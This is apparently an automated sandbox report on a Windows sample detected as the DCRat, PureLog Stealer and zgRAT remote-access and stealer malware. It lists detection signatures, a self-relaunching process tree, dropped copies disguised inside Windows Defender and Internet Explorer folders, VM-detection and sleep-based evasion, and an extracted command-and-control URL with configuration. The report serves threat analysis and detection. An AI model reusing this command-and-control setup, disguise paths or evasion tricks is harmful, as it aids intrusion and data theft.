Windows Analysis Report
KPFv8ATDx0.exe

Overview

General Information

Sample name: KPFv8ATDx0.exe
renamed because original name is a hash value
Original sample name: 3ff58b353cd7e1b70eb300561e146e6c.exe
Analysis ID: 1558732
MD5: 3ff58b353cd7e1b70eb300561e146e6c
SHA1: d9059f5389fad25f1bf44b7332c018f806159df9
SHA256: 15892ecb245a5c3aa1ab94d60ed1d034540b14623bdc6f27acfa1f0a5791ed33
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • KPFv8ATDx0.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\KPFv8ATDx0.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
    • cmd.exe (PID: 7460 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7508 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7548 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 7644 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
        • cmd.exe (PID: 7780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7824 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7840 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 7996 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
            • cmd.exe (PID: 8128 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 8184 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 1196 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 1412 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                • cmd.exe (PID: 6328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 1452 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • PING.EXE (PID: 7076 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                  • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 3232 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                    • cmd.exe (PID: 7452 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 7456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • w32tm.exe (PID: 1916 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                      • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 3620 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                        • cmd.exe (PID: 1532 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 4240 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • PING.EXE (PID: 3312 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                          • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 3616 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                            • cmd.exe (PID: 4484 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                              • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • chcp.com (PID: 4332 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                              • w32tm.exe (PID: 5688 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                              • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 5352 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                                • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                  • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                  • chcp.com (PID: 7660 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                  • PING.EXE (PID: 7684 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                  • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 7648 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                                    • cmd.exe (PID: 5820 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                      • chcp.com (PID: 5976 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                      • PING.EXE (PID: 348 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                      • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 6484 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
  • cleanup
{"C2 url": "http://38.180.228.120/cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
KPFv8ATDx0.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
KPFv8ATDx0.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: KPFv8ATDx0.exe PID: 7272 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: oqWNZWQNWoNnROlqjKcKhLM.exe PID: 7644 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.KPFv8ATDx0.exe.3a0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.KPFv8ATDx0.exe.3a0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-19T18:52:22.583859+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49742 | 38.180.228.120 | 80 | TCP
2024-11-19T18:52:35.443182+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49822 | 38.180.228.120 | 80 | TCP
2024-11-19T18:52:46.099413+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49882 | 38.180.228.120 | 80 | TCP
2024-11-19T18:52:59.865009+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49962 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:10.833745+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49975 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:23.318092+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49976 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:33.489962+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49977 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:46.146219+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49978 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:59.315380+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49979 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:09.443063+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49980 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:20.864944+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49981 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:30.271239+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49982 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:41.865014+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:51.099420+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:02.443241+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:14.615047+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:24.693634+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:35.287033+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:46.880784+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:58.455712+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 38.180.228.120 | 80 | TCP
2024-11-19T18:56:08.708973+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49991 | 38.180.228.120 | 80 | TCP

                            AV Detection

Source: KPFv8ATDx0.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\CKTJbAfr.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | Avira: detection malicious, Label: HEUR/AGEN.1329680
Source: C:\Users\user\Desktop\ACAUZvYN.log | Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | Avira: detection malicious, Label: HEUR/AGEN.1329680
Source: C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | Avira: detection malicious, Label: HEUR/AGEN.1329680
Source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://38.180.228.120/cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | ReversingLabs: Detection: 71%
Source: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe | ReversingLabs: Detection: 71%
Source: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\ACAUZvYN.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\AWvLLWqc.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\CKTJbAfr.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\CyIkUInh.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\FvOMJVpt.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\GLOjgbXG.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\GxRSZgBO.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\IHWAbonb.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\KFhcUPbS.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\LWkTXfAf.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\LcQaEBDP.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\NgGUXyfg.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\NqOhhczU.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\NvmJyloG.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ObZHJZRv.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\OgVBQDTo.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\OkvSnMWj.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\OwGrvDOt.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\PAkihvfV.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\PFIKyDTH.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\PYmimUsi.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\RyZipATO.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\SIxHSvEB.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\SeerDZBz.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\UTCgmFWk.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UTTISNjC.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\VcGpvFqH.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\VijSQbQY.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\VxlkbjYv.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\WhRPvofH.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\XOEIXFmQ.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\XaOgexda.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\YHFyVwyQ.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\YPpRAgYW.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\YWHQgFFn.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\abhXZtjw.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\cCsjkXAC.log | ReversingLabs: Detection: 20%
Source: KPFv8ATDx0.exe | ReversingLabs: Detection: 71%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\BXwkEeIS.log | Joe Sandbox ML: detected
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AHwNgZaF.log | Joe Sandbox ML: detected
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EZPbybNn.log | Joe Sandbox ML: detected
Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe | Joe Sandbox ML: detected
Source: KPFv8ATDx0.exe | Joe Sandbox ML: detected
Source: KPFv8ATDx0.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Directory created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Directory created: C:\Program Files\Windows Multimedia Platform\0b77faa1f189a8
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Directory created: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Directory created: C:\Program Files\Windows Defender\0b77faa1f189a8
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Directory created: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Directory created: C:\Program Files\Internet Explorer\en-GB\0b77faa1f189a8
Source: KPFv8ATDx0.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbL source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1867465458.000000001C9A0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbP source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBC9000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | File opened: C:\Users\user
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | File opened: C:\Users\user\AppData
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Code function: 4x nop then jmp 00007FFAAC561F56h | 0_2_00007FFAAC5513B5
Source: C:\Users\user\Desktop\KPFv8ATDx0.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 0_2_00007FFAAC6FCDCD
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then jmp 00007FFAAC591F56h | 7_2_00007FFAAC5813B5
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 7_2_00007FFAAC72CDCD
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then jmp 00007FFAAC5C1F56h | 14_2_00007FFAAC5B13B5
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 14_2_00007FFAAC75CDCD
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then jmp 00007FFAAC661F56h | 20_2_00007FFAAC6513B5
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 20_2_00007FFAAC7FCDCD
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then jmp 00007FFAAC651F56h | 26_2_00007FFAAC6413B5
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 26_2_00007FFAAC7ECDCD
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then jmp 00007FFAAC661F56h | 34_2_00007FFAAC661D4E
Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 34_2_00007FFAAC7FCDCD

                            Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49742 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49882 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49822 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49962 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49987 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49986 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49984 -> 38.180.228.120:80
